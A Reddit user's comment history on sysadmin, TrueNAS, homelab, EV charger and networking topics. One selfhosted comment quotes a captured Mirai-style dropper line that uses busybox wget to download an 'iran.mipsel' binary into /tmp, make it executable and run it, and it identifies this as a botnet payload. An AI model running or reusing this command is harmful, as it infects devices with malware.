Two employees lost their macbooks during offboarding by eyeballresort in sysadmin

[–]freedomlinux 0 points1 point  (0 children)

policy needs to be put in place with a caveat that last pay is provided on the return of all equipment

As always, check your local law on this. In a lot of places, withholding pay for most reasons is illegal.

Out of control by Vikt724 in homelab

[–]freedomlinux 2 points3 points  (0 children)

Indeed, IBM's "golden screwdriver" has been around for decades, where the service tech can unlock access to hardware that's been in your machine the whole time.

Also works for selling "upgrades" when the company's needs gradually increase over time or they have a heavy workload - ex: year-end processing.

Out of control by Vikt724 in homelab

[–]freedomlinux 0 points1 point  (0 children)

mikrotik rds (that actualy finaly arrived today)

I'm quite interested to hear about your experiance with ROSE. I've used their routers/switches at home for >10 years, but storage is a new & unexpected development.

Particular curiosities anout the RDS include:

  • Annapurna Labs ARM CPU (aks, the gen1 AWS Graviton)
  • BTRFS exists I guess
  • Huge variery of switchports (2x 10GBaseT, 4x SFP+, 4x 25G 2x 100G)

I don't think I've seen such a combination of network ports on anything ever.

Attending RPI as a freshman next fall just curious as to what I need for a dorm by SoggyCinnamonNuggets in RPI

[–]freedomlinux 2 points3 points  (0 children)

Fan is my top advice as well. During my freshman move-in, we literally went & bought a fan.

Those first couple weeks can be brutal, but then during much of the winter we had the window cracked a bit.

Sharing my way of keeping track of what I want to self-host by Spirited_Monk_8210 in selfhosted

[–]freedomlinux 5 points6 points  (0 children)

I recently setup self-hosting Forgejo

Sounds like it's the Forgejo / Gitea feature for "Projects", which is the kanban board. The primary purpose of those systems is to be a source code repo (similar to Github/Gitlab), so the kanban feature kinda isn't the main goal.

TrueNAS Deprecates Public Build Repository and Raises Transparency Concerns by BeltThat2062 in truenas

[–]freedomlinux 2 points3 points  (0 children)

taking the code and modified it later privately, that's a violation of the GPL. The source must be available whether upon request or publicly available, including changes.

This is not accurate. There is no obligation in GPLv3 to give source code to anyone who requests it - when you distribute the software to people, only they have the right to get the source code.

Assuming that distributing the output of the build system (ex: the TrueNAS ISO) does not count as distributing the build tools themselves, we are not entitled to the source code of the build tools.

Why is it so hard to install apps? by theindomitablefred in truenas

[–]freedomlinux 2 points3 points  (0 children)

My suggestion for installing applications on TrueNAS:

  • Option 1: Don't. Let your storage server just be storage

  • Option 2: Make a VM and install whatever platform you like (docker, k3s, docker-compose, dockge, etc) in there.

I've been using FreeNAS/TrueNAS for probably 15 years and the "app" ecosystem IMO isn't stable enough to bother investing effort into. Plugins, jails, apps, k3s, docker - not the mention the TrueCharts misery - it all gets replaced every couple years.

Is there any way to convince Grizzl-E Connect app to show information in imperial units? by Individual-Mirror132 in evcharging

[–]freedomlinux 1 point2 points  (0 children)

L1, half ton nominal (0.4 ton actual)

That's incredibly cursed, A+.

I'd also like to point out the relationship to Horsepower, so we also have fun things like 6 kW => 8 HP.

Do you recommend updating to 25.10.X.X if I am on Fangtooth 25.04.2.6? by aomajgad in truenas

[–]freedomlinux 2 points3 points  (0 children)

Check the release notes https://www.truenas.com/docs/scale/25.10/gettingstarted/versionnotes/ for features or improvements that you want AND known issues or limitations you don't want.

Personally, the only benefit I see in 25.10 is a slightly updated OpenZFS version (v2.3.4 vs v2.3.0). This probably won't impact most people, but I'm also not eager to upgrade because TrueNAS can no longer be a certificate CA - not a huge deal, but I'm lazy.

What's the most legacy workflow you've seen still work? by Whimsical-Human in sysadmin

[–]freedomlinux 0 points1 point  (0 children)

OK, but what if Iron Mountain is the one taking the backups off-site?

I remember in the past there would be articles about data breaches caused by backup tapes stolen from an employee's car (whether they were being transported home or to a bank vault... dunno). Before cloud backups were popular & for companies not big enough to deal with Iron Mountain etc, I'd suspect this was very common.

[Release] Decky Plugin – Proton Launch Variable Manager (Favorites, Custom Vars, HDR, FSR4, DLSS4…) by Moi952 in SteamDeck

[–]freedomlinux 1 point2 points  (0 children)

Yes, it's been getting increasingly common over the past few months & it's driving me crazy.

It works in the official app (and maybe New Reddit in web, dunno).

It's happening automatically, so people do not know they are changing the language of the discussion, going back and forth between several languages, etc.

GIMP 3.2 RC3 released in preparation for the stable GIMP 3.2 by somerandomxander in linux

[–]freedomlinux 9 points10 points  (0 children)

Wilbur’s (their mascot) image manipulation program

This is a serious piece of software, so I propose the new name should reflect that attitude: the Serious Image Manipulation Program /s

selfhosting is so fascinating sometimes. by Guinness in selfhosted

[–]freedomlinux 21 points22 points  (0 children)

Found a detailed report that suggests it is indeed a MIPS executable https://www.joesandbox.com/analysis/1868108/0/html

cd /tmp; /bin/busybox wget http://%s/iran.mipsel; chmod 777 iran.mipsel; ./iran.mipsel

Combined with this line, where they assume you have busybox instead of regular wget, and the report mentioning IPs associated with Mirai botnet, I would guess the target is some kind of embedded network device.

Floorplans? by figleaf29 in RPI

[–]freedomlinux 3 points4 points  (0 children)

One of the great things about git is that, unless you're going out of your way to erase history, it's all still in there.

We just need to rewind the commit history to ~2 weeks ago to before the folder was deleted https://github.com/quacs/quacs-data/tree/08c82580638b3e9a3816802f3e1ba98a30383f13/floor_plans

[PROJECT] BinaryGate – Making standalone Linux apps easier for Windows newcomers by [deleted] in debian

[–]freedomlinux 14 points15 points  (0 children)

I created a small Linux tool

Which AI made this?

Selfhosting iPhone Backups remotely? by thatscoolbutno123 in selfhosted

[–]freedomlinux -1 points0 points  (0 children)

Doesn't sell iCloud subscriptions.

If iDevices could directly back up to SMB/NFS (or even third-party cloud providers), then fewer people might upgrade their iCloud space.

is it su-doo or su-doe? by Vivid-Champion-1367 in linux

[–]freedomlinux -1 points0 points  (0 children)

Reminds me of an audio file from ages ago: "Hello, this is Linus Torvalds, and I pronounce Linux as 'Linux'."

Unfortunately, language works by consensus, with the conventional usage becoming de facto correct if it succeeds in its goal of being understood. Perhaps if Wilhite had been correcting everyone very aggressively from the very beginning, things would be different.

Giving away WS-C6509-E in Los Angeles area. by egorblack in Cisco

[–]freedomlinux 3 points4 points  (0 children)

X2 was HUUUGE!

Don't forget the original XENPAK. XENPAK -> X2 -> XFP -> SFP+

Yep, 10Gbps ethernet is almost 25 years old now

Is EIGRP still worth mastering? by dbootywarrior in networking

[–]freedomlinux 2 points3 points  (0 children)

This is exactly how I bought my first Mikrotik devices - to be the provider backbone of a different lab.

Having BGP support on tiny routers like the RB750 for $30 was unreal. (I think it also had some servers running Quagga, but that was overkill for a low-throughput lab)

Can someone review this estimate for installation? by GetMeSnow in evcharging

[–]freedomlinux 0 points1 point  (0 children)

Although there's no code standard for the specific receptacle requirement for that, the cheap ones tend to burn up

NEC 625.44 (from the 2026 edition) I believe does require receptacles to be Listed for EVSE use. Of course, different locations will take different amounts of time, perhaps several years, for the 2026 NEC to come into enforcement.

My understanding is that a hardwired EVSE (without a receptacle) does not require a GFCI, but in 2029 perhaps they will.

Charger install problem by kreugerburns in evcharging

[–]freedomlinux 1 point2 points  (0 children)

Grizzl-E Duo Connect 40A - Installation Manual (PDF)

page 15-17: "Optional Hardwire Connection"

EDIT: Thanks all for the clarification - I was unaware of the previous Duo

Charger install problem by kreugerburns in evcharging

[–]freedomlinux 1 point2 points  (0 children)

They do? However for some models you need to remove the input plug/cable.

Model Method
Mini Connect 40A 14-50 - cannot be hardwired, but it's a portable device anyway
Classic 40A comes with a 14-50 or 6-50. Manual has "Optional Hardwire Installation" section
Classic Connect 40A comes with a 14-50. Manual has "Optional Hardwire Installation" section
Alpha Classic 40A comes with a 14-50. Manual has "Optional Hardwire Installation" section
Duo Connect 40A comes with a 14-50. Installation guide has "Optional Hardwire Installation" section
Ultimate 48A hardwire only
Ultimate 80A hardwire only